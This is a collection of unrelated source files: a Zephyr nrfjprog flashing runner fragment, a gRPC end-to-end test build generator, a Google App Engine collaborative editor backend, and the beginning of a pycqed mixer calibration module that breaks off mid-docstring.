            self.verify_snr(board_snr)
            print("Using board {}".format(board_snr))
            return board_snr
        elif not sys.stdin.isatty():
            raise RuntimeError(
                f'refusing to guess which of {len(snrs)} '
                'connected boards to use. (Interactive prompts '
                'disabled since standard input is not a terminal.) '
                'Please specify a serial number on the command line.')

        snrs = sorted(snrs)
        print('There are multiple boards connected{}.'.format(
            f" matching '{glob}'" if glob != "*" else ""))
        for i, snr in enumerate(snrs, 1):
            print('{}. {}'.format(i, snr))

        p = 'Please select one with desired serial number (1-{}): '.format(
                len(snrs))
        while True:
            try:
                value = input(p)
            except EOFError:
                sys.exit(0)
            try:
                value = int(value)
            except ValueError:
                continue
            if 1 <= value <= len(snrs):
                break
        return snrs[value - 1]

    def ensure_family(self):
        # Ensure self.family is set, deriving it from the build
        # configuration when --nrf-family was not given.

        if self.family is not None:
            return

        if self.build_conf.getboolean('CONFIG_SOC_SERIES_NRF51X'):
            self.family = 'NRF51'
        elif self.build_conf.getboolean('CONFIG_SOC_SERIES_NRF52X'):
            self.family = 'NRF52'
        elif self.build_conf.getboolean('CONFIG_SOC_SERIES_NRF53X'):
            self.family = 'NRF53'
        elif self.build_conf.getboolean('CONFIG_SOC_SERIES_NRF91X'):
            self.family = 'NRF91'
        else:
            raise RuntimeError(f'unknown nRF; update {__file__}')

    def check_force_uicr(self):
        # On SoCs without --sectoranduicrerase, we want to fail by
        # default if the application contains UICR data and we're not sure
        # that the flash will succeed.

        # A map from SoCs which need this check to their UICR address
        # ranges. If self.family isn't in here, do nothing.
        uicr_ranges = {
            'NRF53': ((0x00FF8000, 0x00FF8800),
                      (0x01FF8000, 0x01FF8800)),
            'NRF91': ((0x00FF8000, 0x00FF8800),),
        }

        if self.family not in uicr_ranges:
            return

        uicr = uicr_ranges[self.family]

        if not self.uicr_data_ok and has_region(uicr, self.hex_):
            # Hex file has UICR contents, and that's not OK.
            raise RuntimeError(
                'The hex file contains data placed in the UICR, which '
                'needs a full erase before reprogramming. Run west '
                'flash again with --force, --erase, or --recover.')

    @property
    def uicr_data_ok(self):
        # True if it's OK to try to flash even with UICR data
        # in the image; False otherwise.
        return self.force or self.erase or self.recover

    def recover_target(self):
        '''Run "nrfjprog --recover" (both cores on nRF53).'''
        if self.family == 'NRF53':
            self.logger.info(
                'Recovering and erasing flash memory for both the network '
                'and application cores.')
        else:
            self.logger.info('Recovering and erasing all flash memory.')

        # The network core of the nRF53 needs to be recovered first.
        if self.family == 'NRF53':
            self.check_call(['nrfjprog', '--recover', '-f', self.family,
                             '--coprocessor', 'CP_NETWORK',
                             '--snr', self.dev_id])

        self.check_call(['nrfjprog', '--recover', '-f', self.family,
                         '--snr', self.dev_id])

    def program_hex(self):
        # Get the nrfjprog command use to actually program self.hex_.
        self.logger.info('Flashing file: {}'.format(self.hex_))

        # What type of erase argument should we pass to nrfjprog?
        if self.erase:
            erase_arg = '--chiperase'
        else:
            if self.family == 'NRF52':
                erase_arg = '--sectoranduicrerase'
            else:
                erase_arg = '--sectorerase'

        # What nrfjprog commands do we need to flash this target?
        program_commands = []
        if self.family == 'NRF53':
            # nRF53 requires special treatment due to the extra coprocessor.
            self.program_hex_nrf53(erase_arg, program_commands)
        else:
            # It's important for tool_opt to come last, so it can override
            # any options that we set here.
            program_commands.append(['nrfjprog', '--program', self.hex_,
                                     erase_arg, '--verify',
                                     '-f', self.family,
                                     '--snr', self.dev_id] +
                                    self.tool_opt)

        try:
            for command in program_commands:
                self.check_call(command)
        except subprocess.CalledProcessError as cpe:
            if cpe.returncode == UnavailableOperationBecauseProtectionError:
                if self.family == 'NRF53':
                    family_help = (
                        ' Note: your target is an nRF53; all flash memory '
                        'for both the network and application cores will be '
                        'erased prior to reflashing.')
                else:
                    family_help = (
                        ' Note: this will recover and erase all flash memory '
                        'prior to reflashing.')
                self.logger.error(
                    'Flashing failed because the target '
                    'must be recovered.\n'
                    '  To fix, run "west flash --recover" instead.\n' +
                    family_help)
            raise

    def program_hex_nrf53(self, erase_arg, program_commands):
        # program_hex() helper for nRF53.

        # *********************** NOTE *******************************
        # self.hex_ can contain code for both the application core and
        # the network core.
        #
        # We can't assume, for example, that
        # CONFIG_SOC_NRF5340_CPUAPP=y means self.hex_ only contains
        # data for the app core's flash: the user can put arbitrary
        # addresses into one of the files in HEX_FILES_TO_MERGE.
        #
        # Therefore, on this family, we may need to generate two new
        # hex files, one for each core, and flash them individually
        # with the correct '--coprocessor' arguments.
        #
        # Kind of hacky, but it works, and nrfjprog is not capable of
        # flashing to both cores at once. If self.hex_ only affects
        # one core's flash, then we skip the extra work to save time.
        # ************************************************************

        def add_program_cmd(hex_file, coprocessor):
            program_commands.append(
                ['nrfjprog', '--program', hex_file, erase_arg,
                 '--verify', '-f', 'NRF53', '--snr', self.dev_id,
                 '--coprocessor', coprocessor] + self.tool_opt)

        full_hex = IntelHex()
        full_hex.loadfile(self.hex_, format='hex')
        min_addr, max_addr = full_hex.minaddr(), full_hex.maxaddr()

        # Base address of network coprocessor's flash. From nRF5340
        # OPS. We should get this from DTS instead if multiple values
        # are possible, but this is fine for now.
        net_base = 0x01000000

        if min_addr < net_base <= max_addr:
            # The hex straddles the boundary: split it by segment.
            net_hex, app_hex = IntelHex(), IntelHex()

            for start, stop in full_hex.segments():
                segment_hex = net_hex if start >= net_base else app_hex
                segment_hex.merge(full_hex[start:stop])

            hex_path = Path(self.hex_)
            hex_dir, hex_name = hex_path.parent, hex_path.name

            net_hex_file = os.fspath(hex_dir / f'GENERATED_CP_NETWORK_{hex_name}')
            app_hex_file = os.fspath(
                hex_dir / f'GENERATED_CP_APPLICATION_{hex_name}')

            self.logger.info(
                f'{self.hex_} targets both nRF53 coprocessors; '
                f'splitting it into: {net_hex_file} and {app_hex_file}')

            net_hex.write_hex_file(net_hex_file)
            app_hex.write_hex_file(app_hex_file)

            add_program_cmd(net_hex_file, 'CP_NETWORK')
            add_program_cmd(app_hex_file, 'CP_APPLICATION')
        else:
            coprocessor = 'CP_NETWORK' if max_addr >= net_base else 'CP_APPLICATION'
            add_program_cmd(self.hex_, coprocessor)

    def reset_target(self):
        '''Reset the MCU: soft reset with --softreset, else pin reset
        (enabling pin reset first on nRF52).'''
        if self.family == 'NRF52' and not self.softreset:
            self.check_call(['nrfjprog', '--pinresetenable', '-f', self.family,
                             '--snr', self.dev_id])  # Enable pin reset

        if self.softreset:
            self.check_call(['nrfjprog', '--reset', '-f', self.family,
                             '--snr', self.dev_id])
        else:
            self.check_call(['nrfjprog', '--pinreset', '-f', self.family,
                             '--snr', self.dev_id])

    def do_run(self, command, **kwargs):
        '''Flash self.hex_ onto the selected board and reset it.'''
        self.require('nrfjprog')

        self.ensure_output('hex')
        self.ensure_snr()
        self.ensure_family()
        self.check_force_uicr()

        if self.recover:
            self.recover_target()
        self.program_hex()
        self.reset_target()

        self.logger.info(f'Board with serial number {self.dev_id} '
                         'flashed successfully.')
| |
#!/usr/bin/env python2.7
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generates the appropriate build.json data for all the end2end tests."""
import yaml
import collections
import hashlib
# One flag per capability a fixture can provide; tests declare matching
# requirements in TestOptions and compatible() pairs them up.
FixtureOptions = collections.namedtuple(
    'FixtureOptions',
    'fullstack includes_proxy dns_resolver name_resolution secure platforms ci_mac tracing exclude_configs exclude_iomgrs large_writes enables_compression supports_compression is_inproc is_http2 supports_proxy_auth supports_write_buffering')
# Positional values follow the field order declared just above.
default_unsecure_fixture_options = FixtureOptions(
    True, False, True, True, False, ['windows', 'linux', 'mac', 'posix'], True, False, [], [], True, False, True, False, True, False, True)
socketpair_unsecure_fixture_options = default_unsecure_fixture_options._replace(fullstack=False, dns_resolver=False)
default_secure_fixture_options = default_unsecure_fixture_options._replace(secure=True)
uds_fixture_options = default_unsecure_fixture_options._replace(dns_resolver=False, platforms=['linux', 'mac', 'posix'], exclude_iomgrs=['uv'])
fd_unsecure_fixture_options = default_unsecure_fixture_options._replace(
    dns_resolver=False, fullstack=False, platforms=['linux', 'mac', 'posix'], exclude_iomgrs=['uv'])
inproc_fixture_options = default_unsecure_fixture_options._replace(dns_resolver=False, fullstack=False, name_resolution=False, supports_compression=False, is_inproc=True, is_http2=False, supports_write_buffering=False)

# maps fixture name to its FixtureOptions
END2END_FIXTURES = {
    'h2_compress': default_unsecure_fixture_options._replace(enables_compression=True),
    'h2_census': default_unsecure_fixture_options,
    'h2_load_reporting': default_unsecure_fixture_options,
    'h2_fakesec': default_secure_fixture_options._replace(ci_mac=False),
    'h2_fd': fd_unsecure_fixture_options,
    'h2_full': default_unsecure_fixture_options,
    'h2_full+pipe': default_unsecure_fixture_options._replace(
        platforms=['linux'], exclude_iomgrs=['uv']),
    'h2_full+trace': default_unsecure_fixture_options._replace(tracing=True),
    'h2_full+workarounds': default_unsecure_fixture_options,
    'h2_http_proxy': default_unsecure_fixture_options._replace(
        ci_mac=False, exclude_iomgrs=['uv'], supports_proxy_auth=True),
    'h2_oauth2': default_secure_fixture_options._replace(
        ci_mac=False, exclude_iomgrs=['uv']),
    'h2_proxy': default_unsecure_fixture_options._replace(
        includes_proxy=True, ci_mac=False, exclude_iomgrs=['uv']),
    'h2_sockpair_1byte': socketpair_unsecure_fixture_options._replace(
        ci_mac=False, exclude_configs=['msan'], large_writes=False,
        exclude_iomgrs=['uv']),
    'h2_sockpair': socketpair_unsecure_fixture_options._replace(
        ci_mac=False, exclude_iomgrs=['uv']),
    'h2_sockpair+trace': socketpair_unsecure_fixture_options._replace(
        ci_mac=False, tracing=True, large_writes=False, exclude_iomgrs=['uv']),
    'h2_ssl': default_secure_fixture_options,
    'h2_ssl_proxy': default_secure_fixture_options._replace(
        includes_proxy=True, ci_mac=False, exclude_iomgrs=['uv']),
    'h2_uds': uds_fixture_options,
    'inproc': inproc_fixture_options
}
# One flag per requirement a test can place on its fixture; see
# FixtureOptions above and compatible() below for the pairing.
TestOptions = collections.namedtuple(
    'TestOptions',
    'needs_fullstack needs_dns needs_names proxyable secure traceable cpu_cost exclude_iomgrs large_writes flaky allows_compression needs_compression exclude_inproc needs_http2 needs_proxy_auth needs_write_buffering')
# Positional values follow the field order declared just above.
default_test_options = TestOptions(False, False, False, True, False, True, 1.0, [], False, False, True, False, False, False, False, False)
connectivity_test_options = default_test_options._replace(needs_fullstack=True)

# Relative cpu_cost assigned to lightweight tests.
LOWCPU = 0.1

# maps test names to options
END2END_TESTS = {
    'authority_not_supported': default_test_options,
    'bad_hostname': default_test_options._replace(needs_names=True),
    'bad_ping': connectivity_test_options._replace(proxyable=False),
    'binary_metadata': default_test_options._replace(cpu_cost=LOWCPU),
    'resource_quota_server': default_test_options._replace(large_writes=True,
                                                           proxyable=False,
                                                           allows_compression=False),
    'call_creds': default_test_options._replace(secure=True),
    'cancel_after_accept': default_test_options._replace(cpu_cost=LOWCPU),
    'cancel_after_client_done': default_test_options._replace(cpu_cost=LOWCPU),
    'cancel_after_invoke': default_test_options._replace(cpu_cost=LOWCPU),
    'cancel_after_round_trip': default_test_options._replace(cpu_cost=LOWCPU),
    'cancel_before_invoke': default_test_options._replace(cpu_cost=LOWCPU),
    'cancel_in_a_vacuum': default_test_options._replace(cpu_cost=LOWCPU),
    'cancel_with_status': default_test_options._replace(cpu_cost=LOWCPU),
    'compressed_payload': default_test_options._replace(proxyable=False,needs_compression=True),
    'connectivity': connectivity_test_options._replace(needs_names=True,
        proxyable=False, cpu_cost=LOWCPU, exclude_iomgrs=['uv']),
    'default_host': default_test_options._replace(needs_fullstack=True,
                                                  needs_dns=True,needs_names=True),
    'disappearing_server': connectivity_test_options._replace(flaky=True,needs_names=True),
    'empty_batch': default_test_options._replace(cpu_cost=LOWCPU),
    'filter_causes_close': default_test_options._replace(cpu_cost=LOWCPU),
    'filter_call_init_fails': default_test_options,
    'filter_latency': default_test_options._replace(cpu_cost=LOWCPU),
    'graceful_server_shutdown': default_test_options._replace(cpu_cost=LOWCPU,exclude_inproc=True),
    'hpack_size': default_test_options._replace(proxyable=False,
                                                traceable=False,
                                                cpu_cost=LOWCPU),
    'high_initial_seqno': default_test_options._replace(cpu_cost=LOWCPU),
    'idempotent_request': default_test_options,
    'invoke_large_request': default_test_options,
    'keepalive_timeout': default_test_options._replace(proxyable=False,
                                                       cpu_cost=LOWCPU,
                                                       needs_http2=True),
    'large_metadata': default_test_options,
    'max_concurrent_streams': default_test_options._replace(
        proxyable=False, cpu_cost=LOWCPU, exclude_inproc=True),
    'max_connection_age': default_test_options._replace(cpu_cost=LOWCPU,
                                                        exclude_inproc=True),
    'max_connection_idle': connectivity_test_options._replace(
        proxyable=False, exclude_iomgrs=['uv'], cpu_cost=LOWCPU),
    'max_message_length': default_test_options._replace(cpu_cost=LOWCPU),
    'negative_deadline': default_test_options,
    'network_status_change': default_test_options._replace(cpu_cost=LOWCPU),
    'no_logging': default_test_options._replace(traceable=False),
    'no_op': default_test_options,
    'payload': default_test_options,
    'load_reporting_hook': default_test_options,
    'ping_pong_streaming': default_test_options._replace(cpu_cost=LOWCPU),
    'ping': connectivity_test_options._replace(proxyable=False, cpu_cost=LOWCPU),
    'proxy_auth': default_test_options._replace(needs_proxy_auth=True),
    'registered_call': default_test_options,
    'request_with_flags': default_test_options._replace(
        proxyable=False, cpu_cost=LOWCPU),
    'request_with_payload': default_test_options._replace(cpu_cost=LOWCPU),
    'server_finishes_request': default_test_options._replace(cpu_cost=LOWCPU),
    'shutdown_finishes_calls': default_test_options._replace(cpu_cost=LOWCPU),
    'shutdown_finishes_tags': default_test_options._replace(cpu_cost=LOWCPU),
    'simple_cacheable_request': default_test_options._replace(cpu_cost=LOWCPU),
    'stream_compression_compressed_payload': default_test_options._replace(proxyable=False,
                                                                           exclude_inproc=True),
    'stream_compression_payload': default_test_options._replace(exclude_inproc=True),
    'stream_compression_ping_pong_streaming': default_test_options._replace(exclude_inproc=True),
    'simple_delayed_request': connectivity_test_options,
    'simple_metadata': default_test_options,
    'simple_request': default_test_options,
    'streaming_error_response': default_test_options._replace(cpu_cost=LOWCPU),
    'trailing_metadata': default_test_options,
    'workaround_cronet_compression': default_test_options,
    'write_buffering': default_test_options._replace(cpu_cost=LOWCPU,
                                                     needs_write_buffering=True),
    'write_buffering_at_end': default_test_options._replace(cpu_cost=LOWCPU,
                                                            needs_write_buffering=True),
}
def compatible(f, t):
  """Return True if test `t` can run on fixture `f`.

  A pairing is rejected when the test requires a capability the fixture
  lacks, or when the fixture has a property the test does not tolerate.
  """
  test = END2END_TESTS[t]
  fixture = END2END_FIXTURES[f]
  # (test requires it, fixture provides it)
  requirements = [
      (test.needs_fullstack, fixture.fullstack),
      (test.needs_dns, fixture.dns_resolver),
      (test.needs_names, fixture.name_resolution),
      (test.large_writes, fixture.large_writes),
      (test.needs_compression, fixture.supports_compression),
      (test.needs_http2, fixture.is_http2),
      (test.needs_proxy_auth, fixture.supports_proxy_auth),
      (test.needs_write_buffering, fixture.supports_write_buffering),
  ]
  # (test forbids it, fixture has it)
  exclusions = [
      (not test.proxyable, fixture.includes_proxy),
      (not test.traceable, fixture.tracing),
      (not test.allows_compression, fixture.enables_compression),
      (test.exclude_inproc, fixture.is_inproc),
  ]
  if any(required and not provided for required, provided in requirements):
    return False
  return not any(forbidden and present for forbidden, present in exclusions)
def without(l, e):
  """Return a copy of list `l` with the first occurrence of `e` removed.

  Raises ValueError (as list.remove does) when `e` is not present.
  The input list is left untouched.
  """
  remaining = list(l)
  remaining.remove(e)
  return remaining
def main():
  """Print (to stdout) the YAML build specification for the end2end suites.

  The emitted document contains:
    * 'libs': the secure and insecure end2end test libraries,
    * 'targets': one non-run build target per fixture, plus nosec variants
      for fixtures that do not require security,
    * 'tests': one runnable entry per compatible (fixture, test) pair,
    * 'core_end2end_tests': map of test name -> whether the test is secure.
  """
  sec_deps = [
      'grpc_test_util',
      'grpc',
      'gpr_test_util',
      'gpr'
  ]
  unsec_deps = [
      'grpc_test_util_unsecure',
      'grpc_unsecure',
      'gpr_test_util',
      'gpr'
  ]
  # Renamed from `json` to avoid shadowing the stdlib module name.
  build_spec = {
      '#': 'generated with test/end2end/gen_build_json.py',
      'libs': [
          {
              'name': 'end2end_tests',
              'build': 'private',
              'language': 'c',
              'secure': True,
              'src': ['test/core/end2end/end2end_tests.cc',
                      'test/core/end2end/end2end_test_utils.cc'] + [
                  'test/core/end2end/tests/%s.cc' % t
                  for t in sorted(END2END_TESTS.keys())],
              'headers': ['test/core/end2end/tests/cancel_test_helpers.h',
                          'test/core/end2end/end2end_tests.h'],
              'deps': sec_deps,
              'vs_proj_dir': 'test/end2end/tests',
          }
      ] + [
          {
              'name': 'end2end_nosec_tests',
              'build': 'private',
              'language': 'c',
              'secure': False,
              'src': ['test/core/end2end/end2end_nosec_tests.cc',
                      'test/core/end2end/end2end_test_utils.cc'] + [
                  'test/core/end2end/tests/%s.cc' % t
                  for t in sorted(END2END_TESTS.keys())
                  if not END2END_TESTS[t].secure],
              'headers': ['test/core/end2end/tests/cancel_test_helpers.h',
                          'test/core/end2end/end2end_tests.h'],
              'deps': unsec_deps,
              'vs_proj_dir': 'test/end2end/tests',
          }
      ],
      'targets': [
          {
              'name': '%s_test' % f,
              'build': 'test',
              'language': 'c',
              'run': False,
              'src': ['test/core/end2end/fixtures/%s.cc' % f],
              'platforms': END2END_FIXTURES[f].platforms,
              # Drop 'mac' from CI platforms unless the fixture opts in.
              'ci_platforms': (END2END_FIXTURES[f].platforms
                               if END2END_FIXTURES[f].ci_mac else without(
                                   END2END_FIXTURES[f].platforms, 'mac')),
              'deps': [
                  'end2end_tests'
              ] + sec_deps,
              'vs_proj_dir': 'test/end2end/fixtures',
          }
          for f in sorted(END2END_FIXTURES.keys())
      ] + [
          {
              'name': '%s_nosec_test' % f,
              'build': 'test',
              'language': 'c',
              'secure': False,
              'src': ['test/core/end2end/fixtures/%s.cc' % f],
              'run': False,
              'platforms': END2END_FIXTURES[f].platforms,
              'ci_platforms': (END2END_FIXTURES[f].platforms
                               if END2END_FIXTURES[f].ci_mac else without(
                                   END2END_FIXTURES[f].platforms, 'mac')),
              'deps': [
                  'end2end_nosec_tests'
              ] + unsec_deps,
              'vs_proj_dir': 'test/end2end/fixtures',
          }
          for f in sorted(END2END_FIXTURES.keys())
          if not END2END_FIXTURES[f].secure
      ],
      'tests': [
          {
              'name': '%s_test' % f,
              'args': [t],
              'exclude_configs': END2END_FIXTURES[f].exclude_configs,
              'exclude_iomgrs': list(set(END2END_FIXTURES[f].exclude_iomgrs) |
                                     set(END2END_TESTS[t].exclude_iomgrs)),
              'platforms': END2END_FIXTURES[f].platforms,
              'ci_platforms': (END2END_FIXTURES[f].platforms
                               if END2END_FIXTURES[f].ci_mac else without(
                                   END2END_FIXTURES[f].platforms, 'mac')),
              'flaky': END2END_TESTS[t].flaky,
              'language': 'c',
              'cpu_cost': END2END_TESTS[t].cpu_cost,
          }
          for f in sorted(END2END_FIXTURES.keys())
          for t in sorted(END2END_TESTS.keys()) if compatible(f, t)
      ] + [
          {
              'name': '%s_nosec_test' % f,
              'args': [t],
              'exclude_configs': END2END_FIXTURES[f].exclude_configs,
              'exclude_iomgrs': list(set(END2END_FIXTURES[f].exclude_iomgrs) |
                                     set(END2END_TESTS[t].exclude_iomgrs)),
              'platforms': END2END_FIXTURES[f].platforms,
              'ci_platforms': (END2END_FIXTURES[f].platforms
                               if END2END_FIXTURES[f].ci_mac else without(
                                   END2END_FIXTURES[f].platforms, 'mac')),
              'flaky': END2END_TESTS[t].flaky,
              'language': 'c',
              'cpu_cost': END2END_TESTS[t].cpu_cost,
          }
          for f in sorted(END2END_FIXTURES.keys())
          if not END2END_FIXTURES[f].secure
          for t in sorted(END2END_TESTS.keys())
          if compatible(f, t) and not END2END_TESTS[t].secure
      ],
      'core_end2end_tests': dict(
          (t, END2END_TESTS[t].secure)
          for t in END2END_TESTS.keys()
      )
  }
  # BUG FIX (portability): `print x` is Python-2-only syntax; print() with a
  # single argument behaves identically on Python 2 and 3.
  print(yaml.dump(build_spec))


if __name__ == '__main__':
  main()
| |
#!/usr/bin/env python
import os
import time
import logging
import hashlib
import random
import wsgiref.handlers
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext import db
from google.appengine.ext.webapp import template
from google.appengine.api import memcache
import json
# Dear reader: I learned just as much Python to get this somewhat working. I'm sorry.
class DocRevision(db.Model):
    """Datastore model: one stored revision of a collaborative document."""
    hash = db.StringProperty()  # document identifier, shared by all revisions
    owner = db.UserProperty()  # user that created this revision (may be None)
    session = db.StringProperty()  # browser session that produced the revision
    name = db.StringProperty()
    data = db.TextProperty()
    version = db.IntegerProperty()  # increasing counter (memcache-based, see AddData)
    lastUpdate = db.DateTimeProperty(auto_now_add=True)
    def forJSON(self):
        # Full payload, including the document body, for serialization.
        return {'data' : ''+self.data , 'name' : self.name , 'version' : self.version}
    def infoJSON(self):
        # Metadata only (no document body), for listing saved documents.
        return {'name' : self.name , 'hash' : self.hash , 'version' : self.version , 'lastUpdate' : str(self.lastUpdate)}
class SavedDoc(db.Model):
    """Datastore model: marks a document hash as saved by a user."""
    hash = db.StringProperty()  # document identifier (DocRevision.hash)
    owner = db.UserProperty()
    session = db.StringProperty()
    def forJSON(self):
        # Only the document reference is serialized.
        return {'hash' : ''+self.hash}
class Gadget(webapp.RequestHandler):
    """Serves the editor's gadget XML for a given document id."""
    def get(self):
        user = users.get_current_user()
        doc_id = self.request.get('id')
        xml_path = os.path.join(os.path.dirname(__file__), 'gadget.t.xml')
        self.response.headers['Content-Type'] = 'text/xml'
        self.response.out.write(template.render(xml_path, {'docId': doc_id}))
class MainPage(webapp.RequestHandler):
    """Renders the editor page; redirects to a fresh document id when none is given."""
    def randomHash(self):
        # NOTE(review): random.random() is not cryptographically strong; these
        # hashes serve as document/session ids — confirm unguessability is not
        # a requirement before reusing.
        return hashlib.sha1(str(random.random())).hexdigest();
    def get(self):
        user = users.get_current_user()
        docHash = self.request.get('id');
        isTest = self.request.get('test');
        isBlank = self.request.get('blank')
        isGadget = self.request.get('gadget')
        gadgetLibs = self.request.get('libs')
        # A comma-separated ?libs= value is handed to the template as a list.
        if(gadgetLibs is not None and gadgetLibs != ""):
            gadgetLibs = gadgetLibs.split(",")
        if docHash is None or docHash == "":
            # No document id: redirect to a freshly generated one, carrying an
            # optional ?template= parameter through.
            uri = '/?id='+self.randomHash()
            if self.request.get('template') != "":
                uri = uri + "&template=" + self.request.get('template')
            path = os.path.join(os.path.dirname(__file__), "redirect.t.html")
            self.response.out.write(template.render(path, { 'uri' : uri }))
        else:
            userName = "";
            if user:
                userName = user.nickname()
            newId = self.randomHash();
            guidBase = self.randomHash();
            now = int(time.time() * 1000);  # server time in milliseconds
            sessionId = self.randomHash();
            self.response.headers['Content-Type'] = 'text/html'
            # ?test=1 selects the non-minified template for debugging.
            template_file = 'index.t.html.mini';
            if self.request.get('test') == '1':
                template_file = 'index.t.html'
            path = os.path.join(os.path.dirname(__file__), template_file)
            self.response.out.write(template.render(path, { 'docId' : docHash , 'userName' : userName, 'newId' : newId, 'guidBase' : guidBase, 'nowMilliseconds': now, "sessionId" : sessionId, "isTest" : isTest, "isBlank" : isBlank, "isGadget" : isGadget, 'gadgetLibs' : gadgetLibs }))
class Login(webapp.RequestHandler):
    """Redirects to the ?continue= URI, via the login page when not signed in."""
    def get(self):
        target = self.request.get("continue")
        if users.get_current_user():
            self.redirect(target)
        else:
            self.redirect(users.create_login_url(target))
class SaveDocument(webapp.RequestHandler):
    """Bookmarks a document hash for the logged-in user (GET /save?hash=...)."""
    def get(self):
        user = users.get_current_user()
        if user:
            docHash = self.request.get('hash')
            # Only create the SavedDoc once per (user, hash) pair.
            exists = False
            docs = SavedDoc.gql("WHERE owner = :1 AND hash = :2", user, docHash)
            for doc in docs:
                exists = True
                break
            if not exists:
                doc = SavedDoc()
                doc.hash = docHash
                doc.owner = user
                doc.put()
            # BUG FIX: the stdlib json module has no write(); use dumps().
            self.response.out.write(json.dumps({ 'success' : True }))
        else:
            self.response.out.write(json.dumps({ 'error' : "no_login" }))
class GetSavedDocuments(webapp.RequestHandler):
    """Lists metadata of the newest revision of each document saved by the user."""
    def get(self):
        user = users.get_current_user()
        if user:
            docs = SavedDoc.gql('WHERE owner = :1', user).fetch(100)
            data = []
            for doc in docs:
                # find the current (highest-version) revision
                if doc.hash != "":
                    revs = DocRevision.gql("WHERE hash = :1 ORDER BY version DESC", doc.hash).fetch(1)
                    for rev in revs:
                        data.append(rev.infoJSON())
            # BUG FIX: the stdlib json module has no write(); use dumps().
            self.response.out.write(json.dumps(data))
        else:
            self.response.out.write(json.dumps({ 'error' : "no_login" }))
class AddData(webapp.RequestHandler):
    """Stores a new revision of a document (POST /add)."""
    def post(self):
        user = users.get_current_user()  # optional; anonymous saves are allowed
        # Global revision counter kept in memcache; seeded from the clock so
        # it keeps increasing even after a memcache flush.
        key = 'version'
        version = memcache.get(key)
        if version is None:
            version = 1 + int(time.time())
            memcache.set(key, version)
        else:
            version = memcache.incr(key)
        docHash = self.request.get('hash')
        rev = DocRevision()
        rev.owner = user
        rev.hash = docHash
        rev.name = self.request.get('name').decode('utf-8')
        rev.data = self.request.get('data').decode('utf-8')
        rev.session = self.request.get('session')
        logging.info("Saving data "+rev.hash)
        rev.version = int(version)
        rev.put()
        # BUG FIX: the stdlib json module has no write(); use dumps().
        self.response.out.write(json.dumps({}))
        # cleanup old versions
        revs = DocRevision.gql("WHERE hash = :1 ORDER BY version DESC", docHash).fetch(40)
        count = 0
        for rev in revs:
            if count > 20: # skip entries that might still be needed by other users
                rev.delete()
            count = count + 1
class FetchData(webapp.RequestHandler):
    """Returns revisions newer than a client-supplied version (GET /fetch)."""
    def get(self):
        user = users.get_current_user()
        docHash = self.request.get('hash')
        session = self.request.get('session')
        maxVersion = int(self.request.get('max_version'))
        logging.info(maxVersion)
        i = 0
        logging.info("Looking for data "+str(i))
        newMaxVersion = 0
        if maxVersion > 0:
            # Incremental fetch: everything newer than the client's version.
            revs = DocRevision.gql('WHERE hash = :1 AND version > :2 ORDER BY version', docHash, maxVersion).fetch(10)
        else:
            # Initial fetch: just the latest revision.
            revs = DocRevision.gql("WHERE hash = :1 ORDER BY version DESC", docHash).fetch(1)
        rows = []
        for rev in revs:
            newMaxVersion = rev.version
            if maxVersion == 0 or rev.session != session: # filter my own rows (cant do this in the query because of GQL limitations)
                rows.append(rev.forJSON())
            else:
                logging.info("ignoring row because it is my own: " + session + " = " + rev.session + ";")
        data = {'data' : rows , 'max_version' : newMaxVersion }
        # BUG FIX: the stdlib json module has no write(); use dumps().
        self.response.out.write(json.dumps(data))
class FetchCustomShape(webapp.RequestHandler):
    """Serves a hard-coded custom shape definition (GET /shape)."""
    def get(self):
        # NOTE(review): this payload is not strict JSON (unquoted key _html);
        # the client presumably eval()s it — confirm before changing the format.
        self.response.out.write('{"__CLASS__":"block::ui::CustomShape","_name": "Test", _html: "<table width=100% height=100% style=\'background-color: red\'><tr><td valign=center align=center class=textField></td></tr></table>"}')
def main():
    """Wire up the URL routes and run the WSGI application via CGI."""
    routes = [
        ('/', MainPage),
        ('/add', AddData),
        ('/fetch', FetchData),
        ('/gadget.xml', Gadget),
        ('/shape', FetchCustomShape),
        ('/login', Login),
        ('/documents', GetSavedDocuments),
        ('/save', SaveDocument),
    ]
    application = webapp.WSGIApplication(routes, debug=True)
    wsgiref.handlers.CGIHandler().run(application)
if __name__ == "__main__":
    main()
| |
import cma
from deprecated import deprecated
from qcodes.instrument.parameter import ManualParameter
from pycqed.measurement import detector_functions as det
from pycqed.measurement import mc_parameter_wrapper as pw
from pycqed.measurement.optimization import nelder_mead
from pycqed.analysis import measurement_analysis as ma
# Imported for type annotations
from pycqed.measurement.measurement_control import MeasurementControl
from pycqed.instrument_drivers.physical_instruments.USB_SA124B import SignalHound_USB_SA124B
'''
Contains general calibration routines, most notably for calculating mixer
offsets and skewness. Not all has been transferred to QCodes.
Those things that have not been transferred have a placeholder function and
raise a NotImplementedError.
'''
@deprecated(version='0.4', reason='not used within pyqed')
def measure_E_c(**kw):
    """(Deprecated) Placeholder; the implementation lives in the archived toolbox."""
    raise NotImplementedError('see archived calibration toolbox')
@deprecated(version='0.4', reason='not used within pyqed')
def mixer_carrier_cancellation_duplexer(**kw):
    """(Deprecated) Placeholder; the implementation lives in the archived toolbox."""
    raise NotImplementedError('see archived calibration toolbox')
def mixer_carrier_cancellation(
        SH: SignalHound_USB_SA124B,
        source,
        MC: MeasurementControl,
        chI_par, chQ_par,
        frequency: float = None,
        SH_ref_level: float = -40,
        init_stepsize: float = 0.1,
        x0=(0.0, 0.0),
        label: str = 'Offset_calibration',
        ftarget=-110,
        maxiter=300
):
    """
    Varies the mixer offsets to minimize leakage at the carrier frequency.
    This is a generic version.

    Args:
        SH (instr) : Signal hound used to measure power
        source (instr) : mw_source that provides the leakage tone
        MC (instr) : MeasurementControl used to run the adaptive measurement
        chI_par (par) : parameter setting the I-channel DC offset
        chQ_par (par) : parameter setting the Q-channel DC offset
        frequency (float) : the frequency in Hz at which to minimize leakage;
            if None the source's current frequency is used
        SH_ref_level (float) : Signal hound reference level
        init_stepsize (float): initial stepsize for the CMA-ES optimizer
        x0 (tuple) : starting point for optimization
        label (str) : label for the measurement and its analysis
        ftarget (float) : termination value (target leakage power)
        maxiter (int) : maximum number of optimizer iterations
    Returns:
